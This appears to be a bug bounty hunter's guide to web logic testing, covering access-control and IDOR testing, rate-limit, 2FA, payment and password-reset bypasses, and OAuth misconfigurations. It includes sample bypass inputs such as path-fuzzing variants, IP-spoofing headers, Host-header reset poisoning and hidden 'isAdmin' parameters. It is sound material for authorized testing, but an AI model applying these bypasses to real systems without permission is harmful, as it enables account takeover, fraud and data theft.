GOAL: Send Unexpected HTTP Requests (Or a Series of Requests) to Cause the Application to Act in an Unexpected Way
When hunting for logic vulnerabilities, your goal as the attacker is to send an HTTP Request (or sequence of requests) that the developers did not plan for. Maybe they forgot to apply an Access Control to a specific endpoint/mechanism. Or maybe they failed to validate that a client should be able to access a larger data set from a single unique identifier. Maybe if you drop an request or two in a complex sequence, the mechanism fails open? All of these are possibilities. If you understand how an application works at a deep level and learn to identify insecure patterns, you can start to "bend" the logic of the application to cause unexpected behavior without actually breaking the app.
- Core Steps:
- Understand the Application on a Deep Level
- Identify Complex & Critical Mechanisms
- Send Unexpected Sequence of Events or Requests
The best programs to do logic testing on are Software-as-a-Service (SaaS) companies that have large, complex web applications. The application must have authentication and should have complex access controls, a wide range of mechanisms/functionality, and designed to be used by a large number of users simulatenously. Unlike injection testing where you can isolate specific attack vectors, logic testing requires requires the bug bounty hunter to see the "bigger picture" of how the different components of an application work together. You must first understand how the app works so you can identify the cracks and try to bend/break the logic. Before I begin logic testing a target application, I spend at least 2-3 days understanding how the application works before I do ANY testing. Your mindset should be that you have been hired by this company and are now part of their application security team.
- What language is the back-end written in? - Each server-side language has unique properties that effect the way a bug bounty hunter will approach it. This is especially true for injection testing, but there are several ways the server-side language can effect how the logic of an application executes. Here are a few examples:
- PHP $_SESSION vs $_COOKIE - The handlers PHP uses to access a session token vs. a cookie work in almost the same how, with the main difference being session tokens are stored on the server-side while cookies are stored in the client's browser and can be controlled by an attacker. Imagine a scenario where a new PHP developer intended to set a session token with the user's ID value stored in it. The code should look like this:
<?php session_start(); $_SESSION['user_id'] = 1; echo "Thank you for logging in! Your user ID is: " . $_SESSION['user_id']; ?>
However, if the developer accidently used a cookie instead, the user can easily modify the user ID value in the cookie and access another user's data:<?php setcookie('user_id', 1, time() + (86400 * 30)); ; echo "Thank you for logging in!
- PHP/Node Loose Comparison - Strict Typing Languages like Java and C# don't need different comparison operations because the type is already known. For less strict typing languages like PHP and JavaScript, though, there are two different methods to compare variables. The
==
operator compares the value of the variables without considering the type. This means all positiveint
values equaltrue
,"1"
equals1
, etc. However, the===
operator also compares the type of each variable, so"1" === 1
would returnfalse
. Now consider how this can effect the mechanisms of an application. If a==
operator is being used to compare a password, can you submit atrue
boolean to force the login mechanism to fail open? Anywhere that user-controlled input is compared to a value in stored on the server-side, for PHP or Node applications, there is the possibility of a loose comparison. Java has a similar situation with==
vs..equals()
, but with different implications.
- PHP $_SESSION vs $_COOKIE - The handlers PHP uses to access a session token vs. a cookie work in almost the same how, with the main difference being session tokens are stored on the server-side while cookies are stored in the client's browser and can be controlled by an attacker. Imagine a scenario where a new PHP developer intended to set a session token with the user's ID value stored in it. The code should look like this:
- Is the app using a frontend framework? (React, Angular, NextJS, etc.) - Each of the well-known JavaScript frontend frameworks have their own way of rendering a DOM. React builds a virtual DOM in the client's browser while NextJS renders the DOM on the server-side, encodes it, then decodes and renders it again in the client's browser. These frameworks can have an especially big impact on how Access Controls are implemented. If someone is using React Router, for example, then the access controls are implemented on the client-side. This is very different from how NextJS handles routing. If you're lucky enough to find an application with React on the frontend that has not properly obfuscated the webpack and is using React Router, you can easily download the raw source code and see exactly how the access controls are implemented. This saves a ton of time testing granular access controls.
- What additional client-side NPM Packages are used? - Almost all applications you will target as a bug bounty hunter will have NPM Packages on the client-side as API's to facilitate actions throughout the app. These packages will contain JavaScript methods that the developers can use to perform complex operations in the client's browser. Many NPM packages have known vulnerabilities which you can look up on webpages like Snyk. Keep in mind that just having a package of the vulnerable version does not mean the application is vulnerable. The developers also need to use the vulnerable method as well, but don't just consider if the package has vulnerabilities. Instead, consider how the package works and what problems it solves. This can help inform your logic testing. If you see lodash used, don't just test for Prototype Pollution and move on. Lodash is often used to merge objects, so maybe you can find a way to inject unexpected values into a critical JSON object? That's just one idea...
- Does the app have any custom client-side JavaScript files? - The client-side code in NPM packages is available for any security researcher that would like to test for vulnerabilities. This means using an NPM package can have both a positive and negative effect on your application's security posture. On the positive side, the code has been thoroughly tested so you can be confident the latest version of the package is secure. However, if you are not using the latest version of the package, attackers can easily identify this and try to exploit known vulnerabilities. With custom JavaScript, the benefits and drawbacks are exactly the opposite. Custom client-side JavaScript has only been tested by the company's internal quality engineers and/or security team. This means it will be harder to find vulnerabilities, but there is a much greater likelihood that you will be able to cause the code to act in a way the developer did not intend. I love to test on applications with large amounts of custom JavaScript. First, try to find flaws in the logic. Check each conditional, for loop, etc. Anywhere that variables containing user-controlled data are evaulated, especially if there is data related to the client's Identify or Role. Keep in mind that most client-side JavaScript, even custom files, will be minified. Tools like JSNice can help make minified JavaScript readable.
- Is there Authentication? - In my opinion, authentication is a requirement for logic testing. An application without authentication rarely has enough complexity to find impactful logic flaws. With authentication, you open up the possibility for Insecure Direct Object References (IDORs) or Access Control Violations. But it's important to remember that there are many different ways of allowing a user to authenticate. Each of these authentication methods will have a downstream effect on how you will attack the application's logic.
- Username/Password - This is the simplest form of authentication. Behind the scenes, the application stores a unique String (Username) and the hash value of a unique String (Password). When the application needs to prove the client's identity (checking for IDORs), it will either use the Username itself as the unique identifier, or it will use a user ID value as part of the larger User Object. If the application does leverage the Username value as the unique identifier, then you can attempt to break the code pattern that validates the Username to gain access to another user's data. For example, what happens if you register an account with the same Username as another user, but you're able to append a unique ASCII Character like a Null Byte to the end. Will you be able to register a unique account (registration mechanism believes this is a unique String) and access data from the victim user (client's identity validation believes this is NOT a unique String)? It's definitely worth a shot!
- Email/Password - This auth pattern works very similar to the Username/Password pattern, with the added complexity of the funky way email syntax works. One of my favorite mechanisms to play with while testing this pattern is Plus Addressing. This allows you to create unique user accounts that are tied to the same email address. This could have implications for password reset requets or any other mechanism that requires an email to be sent to the user's address. Email syntax can also make writing regex to validate the username is much more complex because it's not just a string, it's a specific syntax pattern. Aim for mechanisms that would require you to
- Single Sign On (SSO) - SSO uses the SAML protocol under the hood, so it's important that you understand how SAML works before considering testing an SSO implementation. Authentication through SSO works a lot like a wristband at a music festival. You purchase a ticket that gives you access to specific shows within the music festival. In return, you are given a wristband that identifies which shows you can see. As long as you have your wristband, you can walk right into any of the shows you have purchased, but if you try to enter a show that your wristband does not give you access to you will be stoped from going in. SSO in web applications works very much the same way. The user authenticates through a central service like Okta, for example. Once that user authenticates, they will be given an access token that will allow them to automatically log into any application configured for SSO under that user's account. It is important to know that SSO testing can be very difficult for bug bounty hunters because of how SSO needs to be set up. You first need to have access to set up your own SSO implementation, which is not always the case. Even if you can, though, you also need a valid account through an Identity Provider like Okta. This can be an expense for a bug bounty researcher and requires a lot of specific technical knowledge. When testing SSO/SAML, I sort applications into two categories:
- Program allows bug bounty hunters to set up SSO - If the program allows you to set up an SSO integration, you will have access to valid SAML Request/Response. This opens up several opportunities for researchers to manipulate the SAML Request XML to test for Signature Wrapping Attacks, XXE Attacks, Certificate Faking, Token Recipient Confusion, etc. In my opinion, the best free resource avaliable by far for SAML testing is this blog series by epi. You can also set up your own local SAML Identity Provider test server using a tool like this, and this blog does a great job of showing how to get the test server running locally. One of my favorite ways to find new ideas for attacking protocols like SAML is to look up how to protect it using public resources like the OWASP SAML Cheat Sheet or the SSO Beginners Guide to (mis)configuration. If you know what a secure implementation looks like, you can identify when developers miss these best practices and try to exploit the result.
- Program does NOT allow hunters to set up SSO - Most programs won't allow you to register for SSO but you can still test the login mechanism itself, especially if the application also allows you to register for an account and uses Email/Password as another option for authentication. Remember that the security of an SSO implementation is entirely dependent on the domain registered to the Identity Provider. Part of the inherent security of SAML comes from the fact that attackers are unable to get a valid email address with the victim organization's domain. However, if you as the "attacker" can register an account outside of SSO that has the same domain as an SSO account, you might be able to get bypass some access controls through edge cases in the application logic. Check out reports on Hacktivity like this and this for examples of how this can lead to a valid bug bounty finding.
- OAuth 2.0 - I'm sure I'll mention this several times throughout this doc, but if you see an application that allows you to authenticate using OAuth 2.0, that is already a good sign that you may be able to bend the logic. OAuth is an authorization framework, it was never designed to be used for authentication. I have a section below that goes into great detail on how I test OAuth flows, but for now you should focus on How and Why the application is using OAuth. The most important question I ask myself is, "What Grant Type is the OAuth flow using?" The grant type not only effects how the mechanism works, it has a huge impact on how attackers can cause the mechanism to act in ways the developers did not expect. Once I have identified the grant type, I take special note of all the OAuth Parameters used in the flow. Finally, be sure that you fully understand the Why behind the use of the OAuth mechanism. Is the OAuth flow used simply to identify the client when reading data? If so, this will make IDORs very difficult. Is the OAuth flow used for authorization to different mechanisms in the app? If so, can you modify the scope to bypass existing access controls? What about if the OAuth flow is being used to set up integrations between the API of two apps? If so, are there gaps in the scoping that allow you to gain priviledge escalation on the third-party app through the integration? These are just some examples, but they show why understanding the Why behind the mechanism is so important.
- What Objects can you enumerate? - If you're not familiar with Object Oriented Programming (OOP), Objects are how developers represent real-world objects in code. A web application uses Objects to group and store data based on what that data is meant to represent. The sensitive data stored in these objects is what you as an attacker are trying to get access to. That's why it's so important to take the time to understand what objects exist in the target application and how they are used. If you're breaking into the Pentagon to steal classified documents, you're not just going to grab every paper you see blindly and hope you find the information you're looking for. If you understand what Objects exist, what data they contain, and how they are accessed you will greatly increase your changes of finding gaps in the application's security controls. Here are a few examples of Objects you should keep an eye out for, as well as their implications:
- User Object - Typically contains data regarding the identify of a specific user. May contain their password hash, as well, along with a lot of other sensitive information. User Objects are a great target for IDORs, try to get access to another user's object through any READ mechanism.
- Message Object - If the target application has a messaging system, it's very likely that Message Objects exist in the database. There could even be a Message Series Object that contains multiple messages in sequence. Not only can you try to read the private messages of other users, but you can also try to send messages as other users (CREATE) or modify/delete an existing message (UPDATE).
- Bank Account Object - Any object that represents an inherently sensitive "thing" is a great target for bug bounty hunters because it can be easy to show impact simply by getting access to the data. Consider what information stored in the app would have the most impact for users if an attacker exfiltrated that data. Don't just focus on Objects related to authentication and web-based attacks. Try to find the "Nightmare Scenario" for the user first, then make that happen. If you're testing a banking app, exfiltrating the Account and Routing numbers would allow you to execute wire transfers to yourself from that account by simply walking into a Wells Fargo. These are the Objects you should make special note of while you are working to learn the application.
- How is session established? - Sessions give web applications a way to consistently identify a client between HTTP Requests, specifically because HTTP is not a stateful protocol. Once a user logs in, they will be given a session token that is sent in every subsequent request, allowing the server to quickly identify the logged in user. This session token will be used as a part of just about every logic attack you execute that involves the user's identity, so it's important to understand exactly how the session token works. These differences in the session token change what attack types are possible. For example, a session token stored in a cookie with no encoded data can't be used as an attack vector for an IDOR. Other session tokens that contain data can possibly be attack vectors for IDORs, Access Control Violations, and even injection attacks. I typically put session tokens into one of the following five categories:
- Cookie -> Unique String - This is the most common and most secure form of session token. There is a unique sequence of characters stored as a cookie that cannot be guessed. In this case, the application is almost certainly using this session to instantiate a User Context Object, making IDORs very difficult. Look through this Session Management Cheat Sheet by OWASP for any missing security flags (
secure
,httpOnly
,sameSite
) and the expiration time for any gaps in best practices, but you will most likely need a Client-Side injection to abuse the session on these. - Cookie -> Storing Data No Signature - These session tokens are fantastic for finding hidden attack vectors. If the developers store data in a session token that is not signed and that data is processed by the server-side, that data becomes a fantastic attack vector for a wide range of logic and injection vulnerabilities. The data will likely be encoded, so try some URL and Base64 magic w/ CyberChef or Burpsuite's Decoder.
- Cookie -> Storing Data Signature - If a session token is storing data and it's signed for integrity, there's not much you can do with it outside of a regular Unique String cookie. However, keep in mind that the developers have to add code to validate that session on every endpoint. It's easy to think that there's no way a developer would miss this, or if one endpoint validates the session then they all must validate it, but that's simply not the case. Complex applications have a wide range of needs, it's very difficult for engineers to build an application that has a single piece of code evaluating every request. It's more likely that validating the signature is a middleware or wrapper that is applied to each endpoint, meaning a developer simply needs to forget to apply that library to the endpoint and you've found a new attack vector. They will likely fail to sanitize the data in the session token before it's processed by the server-side code, as well, because they expect it to not be user-controlled. If you can find that, you'll get a few solid bugs!
- Cookie -> JSON Web Token (JWT) - Just like using OAuth 2.0 for authentication, an application using JWTs for session tokens is a good sign for bug bounty hunters on its own. There isn't much different between testing JWTs and cookies w/ data that are signed, except that JWTs have a wide range of known attacks you can use to try and break the JWT validation. JWTs give bug bounty hunters an opportunity to find highly impactful exploit chains. I always test applications that use JSON Web Tokens for session tokens.
- localStorage - Believe it or not, some applications use localStorage to store cookies in the client's browser. There are several reasons why this is not considered best practice. Most importantly, there is no way to protect these values from client-side injection since you cannot add the
httpOnly
flag. Instead, you will need client-side JavaScript to access and process the token for each request. This is a lot of additional complexity where things can go wrong. In my experience, when applications store session tokens in localStorage, the developers don't seem to realize a user can control those values. As long as the app isn't using known services like Keycloak or Firebase, these are fantastic targets for logic testing.
- Cookie -> Unique String - This is the most common and most secure form of session token. There is a unique sequence of characters stored as a cookie that cannot be guessed. In this case, the application is almost certainly using this session to instantiate a User Context Object, making IDORs very difficult. Look through this Session Management Cheat Sheet by OWASP for any missing security flags (
- What type of Access Controls are Implemeneted? - Access Controls determine what mechanisms a specific user has access to. Keep in mind that a mechanism is any HTTP Request (or sequence of requests) that executes a CREATE, READ, UPDATE, or DELETE operation on data in the database. Each mechanism should include a block of code that determines whether the user has the authorization required to execute that mechanism. There are different types of access controls, and each type has its own testing methodology for attackers, so it's important to first identify how an application determines whether a user has access to a specific mechanism. Remember that applications can have more than one type of access controls and the more types an app has, the more complexity and better chance of finding gaps in these controls.
- Role-Based Access Controls (RBAC) - RBAC is the most common form of access controls, and the one most researchers are familiar with. Each user is given a role, for example Admin/Super_User/User, and the role determines what mechanisms the user has access to. When testing RBAC, your goal is to execute a mechanism your role should not be able to execute. Also pay special attention to whether the application uses Hierarchical RBAC, meaning that some roles have inherently more priviledges than others. In that case, try to execute mechanisms available to a higher role.
- Discretionary Access Controls (DAC) - DAC is most commonly implemented for things like Projects or Workspaces in an application. For example, someone creates a Kanban Board in Jira so their team can track their work on a single project. The creator of the board sends invites to each team member. Once those users have joined, they have access to the board until it is revoked and they can invite other users to access the board, up to their level of priviledges. DAC is often combined with RBAC, which makes the developer's job even harder.
- Policy-Based Access Controls (PBAC) - PBAC allows developers to build a very granular access control system, giving individual users access to specific mechanisms one by one. This type of access control system is incredibly complex and difficult to build without gaps. Applications with PBAC often have thousands of possible Access Control Violation attack vectors. These are great, great targets for logic testing.
- Is there an API? - An Application Programming Interface (API) is a collection of endpoints in an application that are not designed to be used by humans. A human user accesses and manipulates data through a Graphical User Interface (GUI). The GUI is what you see in your web browser when the DOM is fully loaded, then you can use your keyboard and mouse to execute mechanisms and read/modify data. However, if you were going to write a script to read/modify data, you wouldn't need or want to access the GUI. You would just want a simple way to send an HTTP Request and tell the application to return or modify the data. This is exactly what an API does. For bug bounty hunters, API's are fantastic targets for all types of testing. APIs can be a way to circumvent access controls, for example if a regular user can create an API key that has Admin priviledges. Furthermore, because of the nature of APIs, every API endpoint is also a possible IDOR attack vector. API testing is fairly standardized, but there are some considerations that will effect how you test for logic flaws:
- API First Design? - An app built with an API First Design means that any time data is read, modified, or deleted that operation occurs through an API call. For bug bounty hunters, this is both good and bad. Apps built with this design can be very easy to enumerate. You know where all data manipulation will occur, so you can focus your efforts and quickly rule out several types of attacks. However, applying security controls with an API First Design is much easier since the controls can be standardized across all endpoints. Apps built using this design tend to be hard to break, in my experience.
- Internal or External? - API's have completely different build requirements based on whether they are designed to be Interal or External. External API's will likely have static API keys appended as a Header, where as Internal API endpoints are called through typical use of the application will likely just send a session token as part of the cookies.
- Documentation? - Most APIs, especially external APIs, will have some type of formal documentation. This can be incredibly helpful for bug bounty hunters because it will show exactly what the API endpoints exist, what parameters they take, and what they are designed to do. This is a wealth of information, however, this means everyone else has that knowledge as well. Keep in mind that documentation doesn't always tell the full story. Don't forget to fuzz for hidden endpoints, HTTP Verbs, parameters, etc.
- Is CORS Implemented? - Cross-Origin Resource Sharing (CORS) allows developers to decide what applications can bypass the Same Origin Policy and access their API from another origin. This is most common when a company has multiple applications but wants to pull data from one to another. For example, you have an account under
starbucks.com
. Then you go tostarbucksgiftcard.com
to see all the gift cards you have used in your lifetime. Nowstarbucksgiftcard.com
needs to makes an API call tostarbucks.com
to get information about your user account, but the browser will prevent that API call because it violates the Same Origin Policy. To solve this, the developers implement CORS on thestarbucks.com
API and allow it to return data from requests containing thestarbucksgiftcard.com
Origin header. Since this can be hardcoded, you probably won't be able to exploit this type of CORS design. However, the problems come from when an app needs to allow requests from multiple Origin headers. Since there's no way to tell CORS to allow any requests from a list of Origin headers, the developers need to find clever ways to get around this limitation. The best case for you as a bug bounty hunter is the developers simply reflect the value of the Origin header in the Access Control Allow Origin Header (ACAO). This means no matter what Origin header is sent in the OPTIONS pre-flight, the browser will always allow the request to go through since it's own Origin is returned in the response as the ACAO header. What is more common but less impactful is the developers attempting to authorize any subdomain of a specific Origin to bypass the Same Origin Policy. If that's the case, try to combine this with a subdomain takeover for a high impact vulnerability chain. - Are Websockets used? - Websockets allow developers to establish a stateful connection with a client. Once the connection has been established, websocket requests are sent back and forth without the need to identify the client again. The server trusts that the websocket reqeusts are coming from the same user that connected. For bug bounty hunters, websocket requests are a fantastic place to find additional attack vectors and cause the application to act in unexpected ways. It is also common for developers to think websocket requests are more secure because an attacker can't simply use a tool like Postman to send unexpected user-controlled input, but that assumption is obviously incorrect. Burpsuite makes testing websocket traffic very easy. Remember that websocket requests are just a different way to send user-controlled input, you will still test that input in the same way you would if it came from an HTTP request.
Every HTTP Request can be mapped to a CRUD Operation and specific mechanism in the application. Your goal as a bug bounty hunter is to identify every single mechanism in your target application to give you the greatest chance of finding gaps in their security. Each of these mechanisms is likely a unique target for both Access Control Violation and IDOR testing. Before you begin any logic testing on your target, you should manually go through and identify as many mechanisms as you can. This will help give you a full picture of what options are available to you as an attacker, as well as what mechanisms may have downstream effects on the others. This is the final step I take before actually doing logic testing, and it can take a day or two. Below are some examples of mechanisms with critical functions that you may find.
Think Like QE! How Would You Build Test Scripts?
- POST ->
/user/register
--data{"username":"rs0n","password":"P@s$w0rd!"}
- Allows unauthenticated users to create a new account
- IDOR: Not possible, same response to all clients regardless of identity
- ACV: Not possible, this mechansim is available to unauthenticated users
- POST ->
/workspace
--data{"name":"shared workspace 1"}
- Allows Admin users to create a new Workspace
- IDOR: Not possible, same response to all clients regardless of identity
- ACV: Possible, only Admins can create new Workspaces, test with all other roles to bypass RBAC
- POST ->
/user/login
--data{"username":"rs0n","password":"P@s$w0rd!"}
- Allows users with a valid account to log into the application
- IDOR: Not possible, response depends on input not identity
- ACV: Not possible, this mechansim is available to unauthenticated users
- GET ->
/admin/user/[USER_ID]/search
- Allows Admin users to look up detailed information about all other users in a specific Workspace
- IDOR: Possible, can the Admin look up user information in a Workspace they do not belong to?
- ACV: Possible, only Admins can access sensitive user information, test with all other roles to bypass RBAC
- POST ->
/user/profile/update/username
--data{"username":"rs0n_live"}
- Allows users to change their username
- IDOR: Possible, User ID in JWT Cookie used to identify client. Need to cause JWT validation to fail first.
- ACV: Not possible, this mechanisms is available to all users. Unauthenticated users would still need to get an IDOR as part of their ACV.
- UPDATE ->
/workspace/[WORKSPACE_ID]
- Allows all users with access to a workspace to update the description and other non-critical data points
- IDOR: Possible, can users update these values on workspaces they are not members of?
- ACV: Possible, but basically the same attack as IDOR. Sometimes they lines are a bit blurry between the two.
- POST ->
/user/delete
--data{"username":"rs0n","password":"P@s$w0rd!","confirm":true}
- Allows users to delete their account by submitting their valid password and checking a confirmation box
- IDOR: Possible, User ID in JWT Cookie used to identify client. Need to cause JWT validation to fail first.
- Not possible, this mechanisms is available to all users. Unauthenticated users would still need to get an IDOR as part of their ACV.
At this point, you should be very familiar with the application, have a ton of notes written about the app, and have identified/documented the majority of the mechanisms. You're finally ready to begin testing! I start by walking through each of the mechanisms to check for IDORs and ACVs. Next, I test any available OAuth flows for misconfigurations that could allow me to steal a valid access token, spoof a valid access token, expand the scope, etc. Finally, I conduct creative testing on the more complex mechanisms that require is long sequence of HTTP Requests to execute. This testing is hard to standardize, but I will do my best to give you tips and examples from bugs I have found.
- Lack of Access Controls - In this case, the developers failed to apply access controls on a specific mechanism. This does not mean that you were able to change the HTTP request to bypass the access controls, that will come later. This is a simple case of a developer forgetting to check if a user is authorized to execute a mechanism. Here are a few examples:
- Unauthenticated -> Authenticated - An unauthenticated user is able to access a web-based tool at
/querytool
that should only allow authenticated users to query a SQL Database running on the local server. - Role-Based Access Control (RBAC) - A user with the role
Auditor
should only have access to READ mechanisms, but you discover that a user with theAuditor
role can execute an UPDATE mechanism to modify the data they are auditing. - Discretionary Access Control (DAC) - A user without access to a Workspace can modify the description of the workspace by sending an
UPDATE
request to/workspace/[WORKSPACE_ID]/desc
. - Policy-Based Access Control (PBAC) - A user has not been assigned the policy
project:delete
which allows them to delete projects they have access to, but you discover that you can delete a project without that policy being applied to your user object.
- Unauthenticated -> Authenticated - An unauthenticated user is able to access a web-based tool at
- In each of these cases, the developers simply forgot to add a check to validate the authorization given to the user. There's nothing fancy here, you just need to walk through each mechanism and check one by one. Notes are mandatory, scripting can be very helpful, but what makes these great targets for bug bounty hunters is how difficult it can be to automate testing for lack of access controls.
- Lack of Rate Limiting - Just like with the previous test, we aren't looking for a way to bypass rate limiting yet. We're simply looking for mechanisms that should have rate limiting but don't. Keep in mind that this can be a grey area on a lot of bug bounty programs, it can be very hard to show impact with a lack of rate limiting. It's important that you can clearly explain how not having rate limiting on a mechanism could have a significant impact on the application's security posture. For example, if spamming an endpoint causes a security control to fail open, that would be a clear way to show impact.
- Bypass Access Controls - Now that you've gone through each of the mechanisms you identified whether they have access controls applied, you can now try to bypass those access controls. To do this, you first need to identify why the server is asserting that you do not have the access required to execute that mechanism. Here are some examples and ways to possibly bypass the control:
- IP Address - Some mechanisms, especially those meant to be internal (and probably very sensitive/critical), are restricted by IP Address. You can attempt to find a Server-Side Request Forgery (SSRF) that would allow you to send a request to the endpoint from an internal IP, but that's not always possible. Another strategy is to try using HTTP Proxy Headers to trick the application into thinking you have a different IP.
- Path Fuzzing - Sending unexpected characters as part of the URL Path. For example, if a GET request to
/admin/login
returns a 403 Response, try changing the path to/ADMIN/LOGIN
or/admin//;//login
, just as a few examples. Many more examples can be found here and there are many great automated tools that est this, for example 403Bypasser for Burpsuite. You can always just use ffuf as well, or just script it yourself. - Unexpected Access Patterns - The developers have very specific expecations about how a client will access their application. They build their app to be accessed through a web browser with the Fully-Qualified Domain Name (FQDN) over HTTPS. So, as a bug bounty hunter, your goal is to access the app in ways they did NOT expect. Look through the DNS records and try to access the app directly through the IP Address. If there is a CNAME Record, try both domains. If the app is hosted on HTTPS, try accessing endpoints via HTTP on port 80. If the app is using HTTP/2, try downgrading to HTTP/1.1. These all might cause the application's access controls to fail open.
- Hidden Parameters - Try adding parameters like
isAdmin=True
to see if it has any effect. You might get lucky!
- Bypass Rate Limiting - It's much easier to show impact bypassing an existing rate limiting because you know the developers wanted to prevent a large volume to requests coming to this endpoint. Rate limiting is typically done in two ways:
- User Account - If the rate limiting is done by user account, this could allow you to lock out other users as you are testing, so be very careful to only test using account identifiers for users you control. If this is the case, there should be a code pattern where two strings or IDs are compared. Try to modify those values being compared to bypass the rate limiting based on User Account. If you believe it's an ID value being compared, try to perform an UPDATE on your user object to see if that changes the ID value. Ultimately, you need to find what value the server is using to identify you and manipulate the application to change it.
- IP Address - If the server is identifying you by your IP Address (more common and more secure), then your goal is to trick the application into thinking you have a different IP address. They are likely using the value of the remote socket which is not something an attacker can control without a proxy/vpn, but the same Proxy Headers mentioned above can be used here as well. It's very common that these proxy headers will be appended to the list of IP Addresses assigned to the client. Some code patterns may access the address at the [0] index, which others may take the address at the [-1] index, causing unexpected behavior. If you can control the address being evaluated by a header, you have a bypass that could have significant impact.
- Bypass 2FA/MFA - Two-Factor Authentication (2FA) and Multi-Factor Authentication (MFA) require a user to take an additional step before logging in or executing a critical mechanism (password change, for example). As a bug bounty researcher, your goal is to execute that mechanism without taking the additional step. There are countless ways to implement 2FA/MFA in an application, so it's really difficult to standardize how to test this bypass. The more you understand about the target app's extra verification step, the greater chance you will have of finding a way to bypass it. Try dropping requests in the authentication flow, sending unexpected input as part of the validation, etc. You want this mechanism to fail open.
- Bypass Payment Process Restrictions - Once again, there are countless ways to build a mechanism that allows the user to pay the owners of a web application for goods or services. If an attacker is able to bend the logic of that mechanism that effects the final price, or whether a card is actually charged, the company could lose a huge amount of revenue. Your goal as the bug bounty hunter is to send as many different types of unexpected input as possible, in as many different sequences as possible. Try to find patterns the developers would never think of. Can you change the quanity of an item to a negative number, giving a discount on the overall order? Can you drop the HTTP request going to their banking integration that actually charges your card but send the rest of the HTTP requests, causing the application to believe the charge was successful? These are just a few examples, find as many disclosed bug bounty reports as you can on payment logic. This will help you get ideas while you are testing.
- Bypass Registration Restrictions - Some applications prevent users from registering for an account unless they meet certain criteria. Bypassing those restrictions to obtain a valid user account could have a huge impact, depending on the application. More importantly, if you can register an account that has the same unique identifier (username, email, etc.) as an existing account, you could possible exfiltrate sensivite data or takeover the victim's account entirely. All applications will have some form of restrictions on registration. Your goal, once again, is to cause these restrictions to fail open by acting in a way that the developers did not intend.
- Bypass Password Reset Restrictions - Unlike the previous tests that could have countless different controls throughout the larger mechanism, password reset restrictions are fairly straightforward. Either the user is only allowed to reset their own password, or there is also an Admin user that can reset their password for them. Either way, your goal as a bug bounty hunter is to gain control of this mechanism and reset another user's password without permission. There are several ways you could go about that. If the password reset mechanism sends an email to the user with a password reset URL, try modifying the Host Header or fuzzing for hidden headers that might allow you to overwrite the domain of the URL sent to the user. If so, you can change the domain to a server you control and intercept the password reset token in the URL. If the password reset requires you to know the answer to securty questions, try sending unexpected strings or types that will case it to fail open. If there is an Admin role/user that can reset the password, try to gain unauthorized access to that mechanism or find a client-side injection to force a real Admin to change it.
*SUMMARY: Insecure Direct Object References (IDORs) occur when an application fails to validate that a client is authorized to access the data contained in a specific object. Every mechanism in a web application performs a CRUD operation on data stored in the application's database. To accomplish this, the application must find some way to identify the object that is being read/modified/deleted (IDORs don't typically come into play on CREATE mechanisms). A method in the server-side code is designed to take a unique identifier and query the database for the data set represented by that unique identifier. How this works exactly depends on the technology stack, but from a security standpoint they all do the same thing. The vulnerability occurs when the application fails to validate that the user submitting the unique identifier is authorized to access the larger data set.
YouTube Video - [Part I] Bug Bounty Hunting for IDORs and Access Control Violations
- Identify a mechanism that performs a READ, UPDATE, or DELETE operation.
- Determine how the data being modified is being identified in the database.
- From the Session Token? - This only happens when the data being modified is directly linked to the user's identity, but it can be very hard to get an IDOR with this pattern.
- From an ID Value Signed for Integrity? - If the ID value is in a JSON Web Token (JWT) or similar signed data store, then you need to break the signature validation before you can control the ID value and test for IDORs.
- From a user-controlled parameter? - Jackpot, this is the best case scenario for IDORs.
- Find and document the unique identifier of another object of the same type you should not have access to.
- Attempt to access the other object to test whether the application is verifying your authorization to access that data.
YouTube Video - Ask Yourself These Four Questions When Bug Bounty Hunting for IDORs
To identify mechanisms that are good targets for IDORs, ask yourself these four questions for every mechanism:
- Does the endpoint return a unique response based on the client's identity?
- Does the endpoint identify the client by establishing a User Context via a Session Token?
- Does the endpoint identify the client through an ID value with a signature (JWT, etc.)
- Does the endpoint simply pull an ID value from a parameter?
SUMMARY: OAuth testing is one of my favorite ways to test for several reasons. First, OAuth is fairly complex and there are hundreds of different ways to implement the protocol/framework (I've heard it called both). First, as I've mentioned before, OAuth was never designed to be used for Authentication, so if you find an application using OAuth for authentication you've already found a major design flaw. And don't even get me started on using JSON Web Tokens (JWTs) for Session Tokens. Anyway, I digress... OAuth can be implemented in many different patterns with optional variables based on the functionality the developers are looking for. The fact that OAuth is so adaptable is great for flexibility, but it also can make implementing OAuth very complex. As always, this complexity is where the vulnerabilities will live. Also keep in mind that developers are just trying to complete the work they've been asigned on a ticket. They are rarely considering how the OAuth patterns and configurations they choose effect the security of the mechanism. If you understand how the many OAuth patterns work, you can easily identify which patterns have been used in an application. From there, check for known dangerous patterns like not including a state token or not validating the redirect_uri. Masters of OAuth testing can recognize how the pattern and configuration have a downstream effect on the other mechanisms throughout the application. For example, an OAuth integration that does not limit the scope of access for a client to a GDrive instance may allow a legitimate user to access data within the GDrive that they should not have access to, simply because the OAuth scopes are misconfigured. Don't just stop at checking for known issues with OAuth implementations. Really learn how the protocol works and, over time, you will begin to see major security holes that can pay off big!
- Authorization Request
Common parameters: redirect_uri
/response_type
/scope
/state
GET /authorization?client_id=12345&redirect_uri=https://client-app.com/callback&response_type=code&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1
Host: oauth-authorization-server.com
- User Consent
- Authorization Code Grant
- Common parameters: code/state
- Vulnerable to CSRF
GET /callback?code=a1b2c3d4e5f6g7h8&state=ae13d489bd00e3c24 HTTP/1.1
Host: client-app.com
- Access Token Request
- Common parameters: client_secret/grant_type/client_id/redirect_uri/code
POST /token HTTP/1.1
Host: oauth-authorization-server.com
…
client_id=12345&client_secret=SECRET&redirect_uri=https://client-app.com/callback&grant_type=authorization_code&code=a1b2c3d4e5f6g7h8
- Access token grant
- Server responds with Bearer Token
- API call
- Contains Authorization header w/ Bearer Token
- Resource grant
- Server responds with sensitive data
- Step 1: Search traffic for known OAuth parameters
client_id
redirect_uri
response_type
state
- Step 2: Send GET request to known OAuth Service Provider endopints
/.well-known/oauth-authorization-server
/.well-known/openid-configuration
- Step 3: Identify Grant Type (response_type parameter)
- Authorization Code -- response_type=code
- Implicit -- response_type=token (More common in SPAs and Desktop Apps)
- Step 4: Identify misconfigurations that can be abused
- Implicit -- All data in POST request not validated when establishing session
- Authorization Code -- No state parameter used -> CSRF (most impact when linking accounts)
- Authorization Code / Implicit -- Steal code/token through redirect_uri
- There are several redirect possibilities:
- Redirect to any domain
- Redirect to any subdomain
- Redirect to specific domains
- Redirect to one domain, all paths
- Redirect to one domain, specific paths
- Redirect to one domain, one path
- Redirect to whitelisted domains and/or paths based on Regex
- 8a. Can add parameters
